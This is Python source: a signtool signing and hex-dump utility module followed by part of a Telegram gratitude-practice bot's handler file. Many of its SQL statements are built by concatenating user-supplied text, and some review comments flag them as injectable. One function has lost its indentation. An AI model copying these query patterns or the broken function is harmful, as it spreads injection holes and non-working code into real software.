    if not os.path.exists(SignToolPath):
        logging.error("Path to signtool invalid. %s" % SignToolPath)
        return -1
    # Adjust for spaces in the path (when calling the command).
    if " " in SignToolPath:
        SignToolPath = '"' + SignToolPath + '"'
    OutputDir = os.path.dirname(SignatureOutputFile)
    # Signtool docs https://docs.microsoft.com/en-us/dotnet/framework/tools/signtool-exe
    # Signtool parameters from
    # https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/secure-boot-key-generation-and-signing-using-hsm--example # noqa: E501
    # Search for "Secure Boot Key Generation and Signing Using HSM"
    # /p7 makes signtool write the detached signature into OutputDir; the
    # resulting <basename>.p7 is renamed to SignatureOutputFile below.
    params = 'sign /fd sha256 /p7ce DetachedSignedData /p7co ' + Oid + ' /p7 "' + \
        OutputDir + '" /f "' + PfxFilePath + '"'
    if Eku is not None:
        params += ' /u ' + Eku
    if PfxPass is not None:
        # add password if set
        params = params + ' /p ' + PfxPass
    params = params + ' /debug /v "' + ToSignFilePath + '" '
    ret = RunCmd(SignToolPath, params)
    if(ret != 0):
        logging.error("Signtool failed %d" % ret)
        return ret
    signedfile = os.path.join(OutputDir, os.path.basename(ToSignFilePath) + ".p7")
    if(not os.path.isfile(signedfile)):
        raise Exception("Output file doesn't exist %s" % signedfile)
    shutil.move(signedfile, SignatureOutputFile)
    return ret
####
# Locally Sign input file using Windows SDK signtool. This will use a local Pfx file.
# WARNING!!! : This should not be used for production signing as that process should follow
# stronger security practices (HSM / smart cards / etc)
#
# Signing is catalog format which is an attached signature
####
def CatalogSignWithSignTool(SignToolPath, ToSignFilePath, PfxFilePath, PfxPass=None):
    """Sign ToSignFilePath (attached/catalog signature) with the Windows SDK
    signtool using a local PFX.

    WARNING!!! : This should not be used for production signing as that
    process should follow stronger security practices (HSM / smart cards / etc)

    @return signtool's exit code (0 on success; -1 if signtool not found)
    """
    # check signtool path
    if not os.path.exists(SignToolPath):
        logging.error("Path to signtool invalid. %s" % SignToolPath)
        return -1
    # Adjust for spaces in the path (when calling the command).
    if " " in SignToolPath:
        SignToolPath = '"' + SignToolPath + '"'
    OutputDir = os.path.dirname(ToSignFilePath)
    # Signtool docs https://docs.microsoft.com/en-us/dotnet/framework/tools/signtool-exe
    # todo: link to catalog signing documentation
    params = "sign /a /fd SHA256 /f " + PfxFilePath
    if PfxPass is not None:
        # add password if set
        params = params + ' /p ' + PfxPass
    params = params + ' /debug /v "' + ToSignFilePath + '" '
    ret = RunCmd(SignToolPath, params, workingdir=OutputDir)
    if(ret != 0):
        logging.error("Signtool failed %d" % ret)
    return ret
###
# Function to print a byte list as hex and optionally output ascii as well as
# offset within the buffer
###
def PrintByteList(ByteList, IncludeAscii=True, IncludeOffset=True, IncludeHexSep=True, OffsetStart=0):
Ascii = ""
for index in range(len(ByteList)):
# Start of New Line
if(index % 16 == 0):
if(IncludeOffset):
print("0x%04X -" % (index + OffsetStart), end='')
# Midpoint of a Line
if(index % 16 == 8):
if(IncludeHexSep):
print(" -", end='')
# Print As Hex Byte
print(" 0x%02X" % ByteList[index], end='')
# Prepare to Print As Ascii
if(ByteList[index] < 0x20) or (ByteList[index] > 0x7E):
Ascii += "."
else:
Ascii += ("%c" % ByteList[index])
# End of Line
if(index % 16 == 15):
if(IncludeAscii):
print(" %s" % Ascii, end='')
Ascii = ""
print("")
# Done - Lets check if we have partial
if(index % 16 != 15):
# Lets print any partial line of ascii
if(IncludeAscii) and (Ascii != ""):
# Pad out to the correct spot
while(index % 16 != 15):
print(" ", end='')
if(index % 16 == 7): # account for the - symbol in the hex dump
if(IncludeOffset):
print(" ", end='')
index += 1
# print the ascii partial line
print(" %s" % Ascii, end='')
# print a single newline so that next print will be on new line
print("")
# Simplified Comparison Function borrowed from StackOverflow...
# https://stackoverflow.com/questions/1714027/version-number-comparison
# With Python 3.0 help from:
# https://docs.python.org/3.0/whatsnew/3.0.html#ordering-comparisons
def version_compare(version1, version2):
    """Compare two dotted version strings numerically.

    Trailing ".0" components are ignored ("1.0" == "1.0.0").
    Returns 1 if version1 > version2, -1 if smaller, 0 if equal.

    Simplified Comparison Function borrowed from StackOverflow:
    https://stackoverflow.com/questions/1714027/version-number-comparison
    """
    def normalize(ver):
        trimmed = re.sub(r'(\.0+)*$', '', ver)
        return [int(part) for part in trimmed.split(".")]
    left = normalize(version1)
    right = normalize(version2)
    if left > right:
        return 1
    if left < right:
        return -1
    return 0
def import_module_by_file_name(module_file_path):
    '''Import and return the Python module at *module_file_path*.

    Standard spec-based import; expects an absolute path. Raises
    RuntimeError when no import spec can be built for the file.
    '''
    module_name = os.path.basename(module_file_path)
    spec = importlib.util.spec_from_file_location(module_name, module_file_path)
    if spec is None:
        raise RuntimeError(f"Expected module file named {module_file_path}")
    loaded_module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(loaded_module)
    return loaded_module
def locate_class_in_module(Module, DesiredClass):
    '''Return the subclass of DesiredClass found in Module, or None.

    Preference goes to the most specific subclass: if one found class
    subclasses another, the deeper one wins. In this hypothetical class
    hierarchy, GrandChildClass would be picked:

        DesiredClass -> ChildClass -> GrandChildClass

    Raises RuntimeError when two found subclasses belong to unrelated
    hierarchies, since neither can be preferred.
    '''
    found = None
    # Walk everything the module exposes, keeping only classes.
    for attr_name in dir(Module):
        candidate = getattr(Module, attr_name)
        if not inspect.isclass(candidate):
            continue
        # Must be a strict subclass — DesiredClass itself (often visible
        # via the module's own imports) does not count.
        if candidate is DesiredClass or not issubclass(candidate, DesiredClass):
            continue
        if found is None or issubclass(candidate, found):
            # First hit, or a more specific class in the same hierarchy.
            found = candidate
        elif not issubclass(found, candidate):
            # Unrelated hierarchies: ambiguous, refuse to pick.
            raise RuntimeError(f"Multiple instances were found:\n\t{found}\n\t{candidate}")
    return found
if __name__ == '__main__':
    # Library module — nothing to do when executed directly.
    pass
    # Test code for printing a byte buffer
    # a = [0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d]
    # index = 0x55
    # while(index < 0x65):
    #     a.append(index)
    #     PrintByteList(a)
    #     index += 1
|
bot.py | # -*- coding: utf-8 -*-
import random
from datetime import datetime
from threading import Thread
from time import sleep
import schedule
import telebot
import config
import mybotdata as bdat
import mybotfunctions as bfunc
import withstickers as stick
from metrics import update_number_of_users
from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton
bot = telebot.TeleBot(config.token, skip_pending=True)
def update_user_data(message):
    """Refresh the stored @username for the sender's chat_id in bot_users."""
    # NOTE(review): SQL built by string concatenation — injectable if the
    # username contains quotes; consider parameterized queries in ex_command.
    bfunc.ex_command(
        "update bot_users set username = '@" + str(message.from_user.username) + "' where chat_id = '" + str(
            message.chat.id) + "';")
@bot.message_handler(content_types=['video_note'])
def get_VideoNote(message):
    """Store incoming round video notes from listed authors in video_notes."""
    file_id = message.video_note.file_id
    #print(file_id)
    #bot.send_video_note(message.chat.id, file_id)
    # Only listed authors may add video notes to the pool; others are ignored.
    # NOTE(review): SQL built by string concatenation — see update_user_data.
    if str(message.chat.id) in bdat.authors_id:
        bfunc.ex_command("INSERT INTO video_notes (date, file_id, chat_id, `trigger`) VALUES (CURRENT_TIMESTAMP,'" + str(file_id) + "', '" + str(message.chat.id) + "', 1);")
@bot.message_handler(content_types=['voice'])
def get_voice(message):
    """Intake handler for voice messages.

    Voices from the primary author (authors_id[0]) are stored directly;
    everyone else's are forwarded to a moderator (authors_id[1]) with an
    accept/reject inline keyboard. The sender's chat_id travels in the
    caption so later moderation steps can store it and reply to them.
    """
    file_id = message.voice.file_id
    if str(message.chat.id) == bdat.authors_id[0]:
        bfunc.ex_command("INSERT INTO voices (date, file_id, chat_id) VALUES (CURRENT_TIMESTAMP,'" + str(file_id) + "', '" + str(message.chat.id) + "');")
    else:
        bot.send_message(message.chat.id, 'Спасибо, мы приняли ваше голосовое сообщение, оно будет рассмотрено модератором.')
        markup = InlineKeyboardMarkup()
        markup.row_width = 2
        markup.add(InlineKeyboardButton("Принять", callback_data="cb_yes_first", one_time_keyboard=True),
                   InlineKeyboardButton("Отклонить", callback_data="cb_no", one_time_keyboard=True))
        #bot.send_voice(bdat.authors_id[0], file_id, caption=f'{message.chat.id}', reply_markup=markup)
        bot.send_voice(bdat.authors_id[1], file_id, caption=f'{message.chat.id}', reply_markup=markup)
@bot.callback_query_handler(func=lambda call: True)
def callback_query(call):
    """Single dispatcher for all inline-keyboard callbacks.

    Branches: voice moderation (cb_yes_first -> cb_yes / cb_no), delivery
    method selection (cb_voice / cb_text / cb_video_note), and text
    moderation (cb_insp_text_yes / cb_insp_text_no). Each branch clears the
    inline keyboard afterwards so a button cannot be pressed twice.
    """
    if call.data == "cb_yes_first":
        # First moderator accepted: forward the voice to the primary author
        # with a second accept/reject keyboard for the final decision.
        new_markup = InlineKeyboardMarkup()
        new_markup.row_width = 2
        new_markup.add(InlineKeyboardButton("Принять войс", callback_data="cb_yes", one_time_keyboard=True),
                       InlineKeyboardButton("Отклонить войс (удалить)", callback_data="cb_no", one_time_keyboard=True))
        bot.send_voice(bdat.authors_id[0], call.message.voice.file_id, caption=call.message.caption, reply_markup=new_markup)
        bot.answer_callback_query(call.id, "Войс добавлен в базу данных")
        bot.edit_message_reply_markup(chat_id=call.message.chat.id, message_id=call.message.id, reply_markup=None)
    elif call.data == "cb_yes":
        # Final acceptance: persist the voice (the caption carries the
        # original sender's chat_id) and notify the submitter.
        bfunc.ex_command("INSERT INTO voices (date, file_id, chat_id, `trigger`) VALUES (CURRENT_TIMESTAMP,'" + str(
            call.message.voice.file_id) + "', '" + str(call.message.caption) + "', 1);")
        bot.answer_callback_query(call.id, "Войс добавлен в базу данных")
        bot.send_message(call.message.caption,
                         'Ваше голосовое сообщение прошло модерацию. Теперь его смогут прослушать другие пользователи, когда обратятся за вдохновением.')
        bot.edit_message_reply_markup(chat_id=call.message.chat.id, message_id=call.message.id, reply_markup=None)
    elif call.data == "cb_no":
        # Rejection: just acknowledge and remove the keyboard.
        bot.answer_callback_query(call.id, "Войс проигнорирован")
        bot.edit_message_reply_markup(chat_id=call.message.chat.id, message_id=call.message.id, reply_markup=None)
    elif call.data == 'cb_voice':
        bot.answer_callback_query(call.id, "Буду отправлять голосовыми сообщениями")
        bfunc.ex_command(
            "update bot_users set achieve_method = '" + "voice" + "' where chat_id = '" + str(call.message.chat.id) + "';")
        bot.edit_message_reply_markup(chat_id=call.message.chat.id, message_id=call.message.id, reply_markup=None)
    elif call.data == 'cb_text':
        bot.answer_callback_query(call.id, "Буду отправлять текстовыми сообщениями")
        bfunc.ex_command(
            "update bot_users set achieve_method = '" + "text" + "' where chat_id = '" + str(call.message.chat.id) + "';")
        bot.edit_message_reply_markup(chat_id=call.message.chat.id, message_id=call.message.id, reply_markup=None)
    elif call.data == 'cb_video_note':
        bot.answer_callback_query(call.id, "Буду отправлять круглыми видеосообщениями")
        bfunc.ex_command(
            "update bot_users set achieve_method = '" + "video_note" + "' where chat_id = '" + str(call.message.chat.id) + "';")
        bot.edit_message_reply_markup(chat_id=call.message.chat.id, message_id=call.message.id, reply_markup=None)
    # NOTE(review): plain `if` instead of `elif` — harmless because the
    # callback values are disjoint, but inconsistent with the chain above.
    if call.data == "cb_insp_text_yes":
        bfunc.ex_command("INSERT INTO texts (date, text, chat_id, `trigger`) VALUES (CURRENT_TIMESTAMP,'" + call.message.text + "', '" + str(call.message.chat.id) + "', 1);")
        bot.answer_callback_query(call.id, "Текст добавлен")
        bot.edit_message_reply_markup(chat_id=call.message.chat.id, message_id=call.message.id, reply_markup=None)
        #bot.send_message(call.message.caption, 'Ваше текстовое сообщение прошло модерацию. Теперь его смогут прослушать другие пользователи, когда обратятся за вдохновением.')
    elif call.data == "cb_insp_text_no":
        bot.answer_callback_query(call.id, "Текст проигнорирован (все ок, больше жать не надо)")
        bot.edit_message_reply_markup(chat_id=call.message.chat.id, message_id=call.message.id, reply_markup=None)
@bot.message_handler(commands=['set_notification', 'stop', 'menu', 'settings'])
def set_notification(message):
    """Command entry point: refresh user data and ask for a daily reminder time."""
    update_user_data(message)
    prompt = 'Во сколько тебе напомнить о практике благодарности? (по часовому поясу MSK)'
    bot.send_message(message.chat.id, prompt, reply_markup=bdat.many_moments)
    bot.register_next_step_handler(message, set_new_time)
@bot.message_handler(commands=['start', 'help'])
def welcome_message(message):
    """Greet the user: returning users get the main menu, new users start onboarding."""
    chat_id = message.chat.id
    registered_ids = bfunc.to_id_list(bfunc.data_command("select chat_id from bot_users"))
    if chat_id in registered_ids:
        bot.send_message(chat_id, "Вы уже прошли регистрацию в боте. Ты в главном меню",
                         reply_markup=bdat.main_menu_buttons)
        return
    # First contact: create the user row, then kick off the onboarding dialogue.
    update_number_of_users()
    bfunc.ex_command(
        "insert into bot_users(chat_id, date) values('" + str(chat_id) + "', CURRENT_TIMESTAMP)")
    update_user_data(message)
    bot.send_message(chat_id, bdat.welc_text, reply_markup=bdat.yes_no)
    bot.register_next_step_handler(message, _2)
def _2(message):
    """Onboarding: branch on the yes/no answer to the welcome question."""
    chat_id = message.chat.id
    if message.text == 'Да':
        bot.send_message(chat_id,
                         'Отлично! Используя практику благодарности, ты можешь стать позитивнее и счастливее. Так думают не только психологи, но и ученые.',
                         reply_markup=bdat.aga)
        bot.register_next_step_handler(message, _1_3)
        return
    if message.text == 'Нет':
        bot.send_message(chat_id,
                         'Практика благодарности — работающий способ улучшить своё благополучие и качество жизни. Она помогает сформировать привычку лучше относиться к себе и замечать больше хорошего.\n\n Кстати, практика благодарности используется в научно доказанной когнитивно-поведенческой терапии!',
                         reply_markup=bdat.what_to_do)
        bot.register_next_step_handler(message, _2_3)
        return
    # Anything else: re-ask the same question.
    bot.send_message(chat_id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
    bot.register_next_step_handler(message, _2)
def _1_3(message):
    """Onboarding: ask the user for a display name."""
    ask_name = 'Сейчас приступим! Но для начала мне нужно чуть больше узнать о тебе. Как я могу к тебе обращаться? (Напиши имя)'
    bot.send_message(message.chat.id, ask_name, reply_markup=bdat.empty)
    bot.register_next_step_handler(message, your_name)
def _2_3(message):
    """Onboarding: explain how the gratitude practice works, then ask for a name."""
    chat_id = message.chat.id
    bot.send_message(chat_id,
                     'Все очень просто! Тебе нужно каждый день записывать что-то, за что ты ощущаешь благодарность.')
    bot.send_message(chat_id,
                     'Подойдут любые штуки, даже самые небольшие. Можно поблагодарить себя за вкусный обед, хорошую работу, прогулку, встречу с другом. Даже если что-то не получилось, важно поблагодарить себя за эту попытку.',
                     reply_markup=bdat.lets_try)
    bot.register_next_step_handler(message, _1_3)
def your_name(message):
    """Onboarding: store the user's display name, then ask for the preferred wording.

    The name is user-controlled text, so single quotes are doubled before being
    spliced into the UPDATE statement — previously an apostrophe in the name broke
    the SQL (and allowed injection). NOTE(review): a parameterized query inside
    bfunc.ex_command would be the proper fix.
    """
    name = message.text
    safe_name = name.replace("'", "''")  # SQL single-quote escaping
    bfunc.ex_command("update bot_users set nickname = '" + safe_name + "' where chat_id = '" + str(message.chat.id) + "';")
    bot.send_message(message.chat.id,
                     "Хорошо, " + name + "! Как ты хочешь говорить о своих благодарностях?\n\n«Я благодарен» или «Я благодарна»",
                     reply_markup=bdat.gender)
    bot.register_next_step_handler(message, your_gender)
def your_gender(message):
    """Onboarding: store grammatical gender; re-ask on unrecognized input."""
    if message.text == 'Я благодарен':
        bfunc.ex_command("update bot_users set gender = 'male' where chat_id = '" + str(message.chat.id) + "';")
    elif message.text == 'Я благодарна':
        bfunc.ex_command("update bot_users set gender = 'female' where chat_id = '" + str(message.chat.id) + "';")
    else:
        bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
        bot.register_next_step_handler(message, your_gender)
        # BUG FIX: without this return the readiness prompt below was ALSO sent and a
        # second next-step handler was registered for the same incoming message.
        return
    bot.send_message(message.chat.id, bfunc.gender_text(message.chat.id, 'Ура! Ты готов записать первую благодарность?',
                                                        'Ура! Ты готова записать первую благодарность?'),
                     reply_markup=bdat.readiness)
    bot.register_next_step_handler(message, is_ready)
def is_ready(message):
    """Onboarding: either prompt for the first note or offer help feeling gratitude."""
    chat_id = message.chat.id
    if message.text == 'Да!':
        bot.send_message(chat_id,
                         bfunc.gender_text(chat_id, bdat.text_write_grate_male, bdat.text_write_grate_female),
                         reply_markup=bdat.empty)
        bot.register_next_step_handler(message, write_first_grate)
        return
    if message.text == 'Не знаю, что написать':
        # Two-row keyboard: "ready" (gender-specific wording) / "still stuck".
        keyboard = telebot.types.ReplyKeyboardMarkup(True).row(
            bfunc.gender_text(chat_id, 'Готов чувствовать благодарность!',
                              'Готова чувствовать благодарность!')).row('Все еще ничего не приходит на ум')
        bot.send_message(chat_id,
                         bfunc.gender_text(chat_id, bdat.text_feel_1_male, bdat.text_feel_1_female),
                         reply_markup=keyboard)
        bot.register_next_step_handler(message, feel_grate_1)
        return
    bot.send_message(chat_id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
    bot.register_next_step_handler(message, is_ready)
def feel_grate_1(message):
    """Onboarding: user is either ready to write the first note or still stuck.

    Fixes: the two checks were independent `if`s (now `elif`), and an
    unrecognized answer silently ended the conversation — a fallback re-prompt
    consistent with the sibling handlers was added.
    """
    if message.text == 'Готов чувствовать благодарность!' or message.text == 'Готова чувствовать благодарность!':
        bot.send_message(message.chat.id,
                         bfunc.gender_text(message.chat.id, bdat.text_write_grate_male, bdat.text_write_grate_female),
                         reply_markup=bdat.empty)
        bot.register_next_step_handler(message, write_first_grate)
    elif message.text == 'Все еще ничего не приходит на ум':
        bot.send_message(message.chat.id, bdat.text_feel_2, reply_markup=bdat.run)
        bot.register_next_step_handler(message, feel_grate_2)
    else:
        bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
        bot.register_next_step_handler(message, feel_grate_1)
def feel_grate_2(message):
    """Onboarding: after the second hint, prompt the user to write the first note."""
    prompt = bfunc.gender_text(message.chat.id, bdat.text_write_grate_male, bdat.text_write_grate_female)
    bot.send_message(message.chat.id, prompt, reply_markup=bdat.empty)
    bot.register_next_step_handler(message, write_first_grate)
def write_first_grate(message):
    """Store the user's first gratitude note, then move to the follow-up question.

    Fixes: single quotes in the note are doubled before splicing into the INSERT —
    previously an apostrophe broke the SQL statement (and allowed injection).
    NOTE(review): a parameterized query in bfunc.ex_command would be the real fix.
    """
    text = message.text
    try:
        bfunc.ex_command("INSERT INTO notes (date, note, chat_id) VALUES (CURRENT_TIMESTAMP,'" + text.replace("'", "''") + "', '" + str(
            message.chat.id) + "');")
    except Exception as ex:
        bot.send_message(message.chat.id, "Непредвиденная ошибка, попробуйте добавить благодарность снова.")
        bot.register_next_step_handler(message, write_first_grate)
        print(type(ex))
        return
    bot.send_message(message.chat.id,
                     bfunc.gender_text(message.chat.id, bdat.awesome_text_male, bdat.awesome_text_female),
                     reply_markup=bdat.result_feel)
    bot.register_next_step_handler(message, awesome)
def awesome(message):
    """React to the user's feeling after the first note, then continue the tour."""
    if message.text == "Да, чувствую!":
        bot.send_message(message.chat.id,
                         "Здорово! Важно замечать, как отношение к себе и своим успехам по чуть-чуть меняется.")
    elif message.text == "Пока нет :(":
        bot.send_message(message.chat.id,
                         "Конечно, изменения происходят не так быстро. Но благодаря регулярной практике ты обязательно начнешь больше ценить себя, свои успехи и особенности")
    else:
        bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
        bot.register_next_step_handler(message, awesome)
        # BUG FIX: without this return the tour message below was ALSO sent and a
        # second next-step handler (imaginate) was registered alongside this one.
        return
    bot.send_message(message.chat.id,
                     "Когда записываешь благодарность, старайся поглубже в нее погрузиться и прочувствовать ее.",
                     reply_markup=bdat.how_1)
    bot.register_next_step_handler(message, imaginate)
def imaginate(message):
    """Tour step: suggest imagining gratitude as warmth from a friend."""
    tour_text = "Представь, что друг сделал для тебя что-то очень хорошее, и ты чувствуешь тепло, радость, нежность. Только вот сейчас этот друг для себя — ты сам."
    bot.send_message(message.chat.id, tour_text, reply_markup=stick.cute)
    bot.register_next_step_handler(message, dont_forget)
def dont_forget(message):
    """Tour step: remind the user to re-read old notes."""
    tour_text = "Не забывай пересматривать старые благодарности и заново проживать их — так радости будет еще больше."
    bot.send_message(message.chat.id, tour_text, reply_markup=bdat.safety)
    bot.register_next_step_handler(message, safety_exist)
def safety_exist(message):
    """Tour step: explain data storage and the delete-all option."""
    tour_text = "Твои благодарности будут храниться в зашифрованной базе данных. Если захочешь, сможешь в любой момент удалить все благодарности — кнопка для этого будет в настройках."
    bot.send_message(message.chat.id, tour_text, reply_markup=bdat.exellent)
    bot.register_next_step_handler(message, preoffer_again)
def preoffer_again(message):
    """Tour step: offer to record one more gratitude note."""
    bot.send_message(message.chat.id, "Хочешь записать еще благодарность?", reply_markup=bdat.grate_again)
    bot.register_next_step_handler(message, offer_again)
def offer_again(message):
    """Onboarding: branch on whether the user wants to write a second note now."""
    chat_id = message.chat.id
    if message.text == "Хочу!":
        bot.send_message(chat_id,
                         bfunc.gender_text(chat_id, bdat.text_write_grate_male, bdat.text_write_grate_female),
                         reply_markup=bdat.empty)
        bot.register_next_step_handler(message, add_second_grate)
        return
    if message.text == "Пока нет":
        bot.send_message(chat_id, bfunc.gender_text(chat_id, bdat.good_male, bdat.good_female))
        bot.send_message(chat_id,
                         'Кнопка, чтобы добавить новую благодарность, всегда будет в главном меню. Можешь пользоваться ей в любое время дня и ночи =)',
                         reply_markup=bdat.what_time)
        bot.send_message(chat_id,
                         'И последнее! В практике благодарности очень важна регулярность.\n\nДля того, чтобы записать благодарность и стать немного счастливее, нужна всего 1 минута в день. Но важно делать это каждый день.')
        bot.register_next_step_handler(message, time_science)
        return
    bot.send_message(chat_id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
    bot.register_next_step_handler(message, offer_again)
def add_second_grate(message):
    """Store the user's second onboarding note and explain the main-menu workflow.

    Fixes: single quotes in the note are doubled before splicing into the INSERT —
    previously an apostrophe broke the SQL statement (and allowed injection).
    NOTE(review): a parameterized query in bfunc.ex_command would be the real fix.
    """
    text = message.text
    try:
        bfunc.ex_command("INSERT INTO notes (date, note, chat_id) VALUES (CURRENT_TIMESTAMP,'" + text.replace("'", "''") + "', '" + str(
            message.chat.id) + "');")
    except Exception as ex:
        bot.send_message(message.chat.id, "Непредвиденная ошибка, попробуйте добавить благодарность снова.")
        bot.register_next_step_handler(message, add_second_grate)
        print(type(ex))
        return
    bot.send_message(message.chat.id, bfunc.gender_text(message.chat.id, bdat.good_male, bdat.good_female))
    bot.send_message(message.chat.id,
                     'Кнопка, чтобы добавить новую благодарность, всегда будет в главном меню. Можешь пользоваться ей в любое время дня и ночи =)',
                     reply_markup=bdat.what_time)
    bot.send_message(message.chat.id,
                     'И последнее! В практике благодарности очень важна регулярность.\n\nДля того, чтобы записать благодарность и стать немного счастливее, нужна всего 1 минута в день. Но важно делать это каждый день.')
    bot.register_next_step_handler(message, time_science)
def time_science(message):
    """Tour step: morning vs. evening practice — user's choice."""
    tour_text = 'Одни ученые считают, что ее очень полезно делать утром, чтобы сразу настроиться на позитивное восприятие происходящего.\n\nДругие советуют записывать благодарности перед сном — чтобы ощутить ценность уходящего дня.\n\nТут все на твой вкус :) '
    bot.send_message(message.chat.id, tour_text, reply_markup=bdat.i_understood)
    bot.register_next_step_handler(message, yes_important)
def yes_important(message):
    """Tour step: stress regularity, then ask for the reminder time."""
    chat_id = message.chat.id
    bot.send_message(chat_id, 'Да, регулярность тут очень важна.')
    bot.send_message(chat_id, 'Во сколько тебе напомнить о практике благодарности? (по часовому поясу MSK)',
                     reply_markup=bdat.many_moments_onboarding)
    bot.register_next_step_handler(message, set_time)
def set_time(message):
    """Onboarding: persist the reminder time picked from the fixed list of moments."""
    chosen = message.text
    # The value is only stored if it is one of the predefined moments, so the
    # concatenated SQL below can only receive whitelisted text.
    if chosen in bdat.list_moments:
        bot.send_message(message.chat.id, 'Отлично, напомню тебе завтра в ' + chosen + '! До встречи :)')
        bfunc.ex_command(
            "update bot_users set scheduler = '" + chosen + "' where chat_id = '" + str(message.chat.id) + "';")
        bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
    else:
        bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
        bot.register_next_step_handler(message, set_time)
@bot.message_handler(content_types=['text'])
def main_menu(message):
    """Catch-all text handler: dispatch the main-menu buttons.

    Runs for any text message not consumed by a next-step handler. Each branch
    matches one main-menu button label; unknown text is offered to be saved as a
    new gratitude note.
    """
    update_user_data(message)
    # "New gratitude" (two button wordings lead to the same flow).
    if message.text == 'Новая благодарность' or message.text == 'Хочу записать ещё благодарность':
        bot.send_message(message.chat.id,
                         bfunc.gender_text(message.chat.id, bdat.text_write_grate_male, bdat.text_write_grate_female),
                         reply_markup=bdat.back)
        bot.register_next_step_handler(message, new_grate)
    # "Inspiration" section (button label comes from stick.insp).
    elif message.text == stick.insp:
        bot.send_message(message.chat.id, 'Добро пожаловать во Вдохновение — мой любимый раздел.\n\nЗдесь можно вдохновиться благодарностями других пользователей бота и поделиться своими. Все анонимно, нежно и заботливо :3 Все сообщения проходят модерацию. Почитать про историю создания этого раздела можно в [блоге](https://t.me/pioblog/75) разработчика бота.\n\nТы хочешь получить вдохновение или поделиться своим для других?', disable_web_page_preview=True, reply_markup=bdat.insp_1_buttons, parse_mode="Markdown")
        bot.register_next_step_handler(message, select_insp)
    # Settings sub-menu.
    elif message.text == 'Настройки':
        bot.send_message(message.chat.id, 'Что будем настраивать?', reply_markup=bdat.settings_buttons)
        bot.register_next_step_handler(message, settings)
    # Knowledge base: a cached Telegram photo (by file_id) with a caption.
    elif message.text == 'База знаний':
        #bot.send_message(message.chat.id, bdat.knowledge_base, reply_markup=bdat.main_menu_buttons)
        bot.send_photo(message.chat.id,
                       'AgACAgIAAxkBAAEK2eFiP4Wac9FsoAZ5UjZAqRVfeArJEgAC6cAxGyPK-EmUAytTrCDcbQEAAwIAA3MAAyME'
                       ,
                       caption=bdat.knowledge_base)
    # Show the last week's notes plus the total count; paging handled by view_grates.
    elif message.text == 'Мои благодарности':
        bot.send_message(message.chat.id,
                         'Всего благодарностей: ' + bfunc.count_all(message.chat.id) + '\n\n' + bfunc.last_grates(7, 0,
                                                                                                                  message.chat.id),
                         reply_markup=bdat.last_grates_buttons)
        bot.register_next_step_handler(message, view_grates, 1)
    # About the team behind the bot.
    elif message.text == 'Команда бота':
        bot.send_message(message.chat.id, bdat.bot_team_text, reply_markup=bdat.to_main_munu_button,
                         parse_mode="Markdown", disable_web_page_preview=True)
        bot.register_next_step_handler(message, bot_team)
    # Multi-step explanation of the gratitude practice (about_1 .. about_6).
    elif message.text == 'О практике благодарности':
        bot.send_message(message.chat.id,
                         'Сейчас я расскажу тебе о практике благодарности.',
                         reply_markup=bdat.cont_back)
        bot.register_next_step_handler(message, about_1)
    # Emotional-support flow.
    elif message.text == 'Получить поддержку':
        bot.send_message(message.chat.id,
                         'Если ты плохо себя чувствуешь, это нормально. Иногда все мы чувствуем себя не очень. Важно разрешать этому состоянию быть.',
                         reply_markup=bdat.support_1)
        bot.register_next_step_handler(message, support)
    elif message.text == 'В главное меню':
        bot.send_message(message.chat.id,
                         'Ты в главном меню',
                         reply_markup=bdat.main_menu_buttons)
    # Free text: offer to save it as a new gratitude note.
    else:
        #bot.send_message(message.chat.id,'Мы не поняли вашу команду, попробуйте использовать кнопки или начать из главного меню (/start). Если что-то сломалось — пишите @piofant.',reply_markup=bdat.main_menu_buttons)
        bot.send_message(message.chat.id,'Записать отправленный текст как новую благодарность?',reply_markup=bdat.check_that_new_grate_buttons)
        bot.register_next_step_handler(message, check_that_new_grate, text=message.text, old_message=message)
def check_that_new_grate(message, text, old_message):
    """Confirm whether free text should be stored as a new gratitude note."""
    if message.text != 'Да':
        bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
        return
    # Re-dispatch the ORIGINAL message so its text is saved, not the "Да" reply.
    new_grate(old_message)
def select_insp(message):
    """Inspiration section: choose between receiving and sharing inspiration."""
    chat_id = message.chat.id
    if message.text == 'Получить':
        bot.send_message(chat_id, 'Хорошо!\n\nЧто тебе сейчас больше хочется — послушать или почитать благодарности?', reply_markup=bdat.insp_get_buttons)
        bot.register_next_step_handler(message, insp_get)
        return
    if message.text == 'Поделиться':
        bot.send_message(chat_id, 'Вдохновение - это опыт развития практики или уникальная благодарность и рассказанная вокруг неё история, которая задаст облако контекста вокруг благодарности.\n\nКак тебе хочется поделиться — текстом или голосом?', reply_markup=bdat.insp_share_buttons)
        bot.register_next_step_handler(message, insp_share)
        return
    if message.text == 'В главное меню':
        bot.send_message(chat_id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
        return
    bot.send_message(chat_id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
    bot.register_next_step_handler(message, select_insp)
def insp_get(message):
    """Send a random approved inspiration (voice or text) or navigate back.

    Fix: guard against an empty result set — `random.randint(0, len(...) - 1)`
    raised ValueError when no approved entries existed.
    """
    if message.text == 'Послушать':
        voices = bfunc.data_command("SELECT file_id FROM voices WHERE `trigger` = 1")
        if not voices:
            bot.send_message(message.chat.id, 'Пока здесь пусто — попробуй позже.', reply_markup=bdat.insp_get_buttons)
            bot.register_next_step_handler(message, insp_get)
            return
        # voice_number seeds sequential paging in after_voice_insp ("Ещё" button).
        voice_number = len(voices) - 1
        bot.send_voice(message.chat.id, voices[random.randint(0, len(voices) - 1)][0], reply_markup=bdat.after_voice_insp)
        bot.register_next_step_handler(message, after_voice_insp, voice_number)
